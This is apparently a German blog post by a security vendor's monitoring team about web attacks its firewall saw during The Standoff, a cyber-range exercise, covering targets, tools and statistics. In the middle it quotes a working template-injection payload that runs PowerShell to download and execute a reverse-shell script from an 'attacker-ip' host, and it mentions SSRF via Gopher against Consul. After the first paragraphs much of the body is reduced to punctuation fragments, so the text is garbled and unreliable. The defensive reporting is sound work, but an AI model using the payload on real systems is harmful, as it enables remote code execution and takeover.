Beim letzten The Standoff haben wir, das Team des PT Expert Security Center , parallel zu den Teilnehmern an der Konfrontation von der Verteidigungsseite aus die Infrastruktur des Standorts und die einzelnen Büros der digitalen Kopie der auf unserem Cyber-Polygon eingesetzten Metropole überwacht. Zu diesem Zweck haben wir ein zusätzliches Security Operations Center (SOC) eingerichtet , das sozusagen die gesamte Infrastruktur abdeckte und aufgrund dessen alle Aktivitäten der Standoff-Teilnehmer und sogar ein wenig mehr „sah“. Eines der Tools dieses SOC war die PT Application Firewall - eine Webanwendungsschicht-Firewall (lesen Sie in einem unserer vorherigen Artikel die Ergebnisse der Arbeit eines anderen unserer SOC-Tools - PT Sandbox). Im Folgenden konzentrieren wir uns ausschließlich auf das, was auf der Website aus Sicht des Webs passiert ist und welche Ziele die angreifenden Teams ausgewählt haben.
Allgemeine Angriffsstatistik
Im Rahmen von The Standoff haben wir Angriffe auf das Portal der Website selbst sowie auf 30 Webressourcen überwacht, die in der Spielinfrastruktur des Trainingsgeländes enthalten sind. Dies waren Ressourcen, die sowohl im Hauptspiel (Meter des 25-Stunden-Büros - eine Ressource zum Übertragen von Zählerständen, Consul for Nuft - eine Service-Management-Plattform, auf die weiter unten eingegangen wird) als auch bei der Fehlerbehebung (z. B. CMS Umbraco) verwendet wurden Für die Bank of FF ist Mantis Bugtracker for 25 Hours ein Bug-Tracking-System für Softwareprodukte. RConfir RCE ist ein Netzwerkkonfigurations-Management-Service für die Big Bro Group. Leseteams erhielten Punkte für die Implementierung von Risiken sowie für die Suche nach Schwachstellen in Systemen und für die Berichterstellung.
Wer war wer im Cyber-Polygon:
- Heavy Ship Logistics — , , , ;
- 25 Hours — , , , ;
- Tube — , , , ;
- Nuft — , ;
- Big Bro Group — ;
- Bank of FF — .
— , . — , bug bounty, «» , . 13. bug bounty . «», (, RCE Flack BookStore SQL Injection — capture the flag). 29 30 - ( , ). , , web application firewall.
The Standoff PT Application Firewall — .
. 1 . , — , — , — . , , . .
( The Standoff 12:00 12 14:00 17 ).
, PT Application Firewall, , , , . . , , , . , .
ube Bank of FF: CMS Made Simple (CMS), bbord ( ), CMS Umbraco, Prestoshop ( ), Avideo encoder ( ), FHEM tomcat ( ), Consul, openEMR ( ), ATutor ( ) rConfig.
. nmap Burp Suite Python Go: Metasploit. burp suite, Metasploit, Responder-.
30 , , , 5 6 2 6 . , — , .
.
« 25 Hours» Meters. , . HubL, {{}} . , , . : {{7*7}} , 7*7.
:
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder(\"cmd.exe\",\"/c\",\"powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.
.
, (, ), ( ) .
— , Nuft Consul. . Server Side Request Forgery, Gopher PUT .
200 .
, ( — ) ( — ).
( false positive) . .
proofs of concept , . , , , .
, CMS Umbraco ( Bank of FF) , - POST; .
, Meters, , — .
request path .
30 . , . . , (ODBC) backup «» .
, ( The Standoff) , , . web application firewall. PT Application Firewall , . , false positive , .
Positive Technologies (PT Expert Security Center)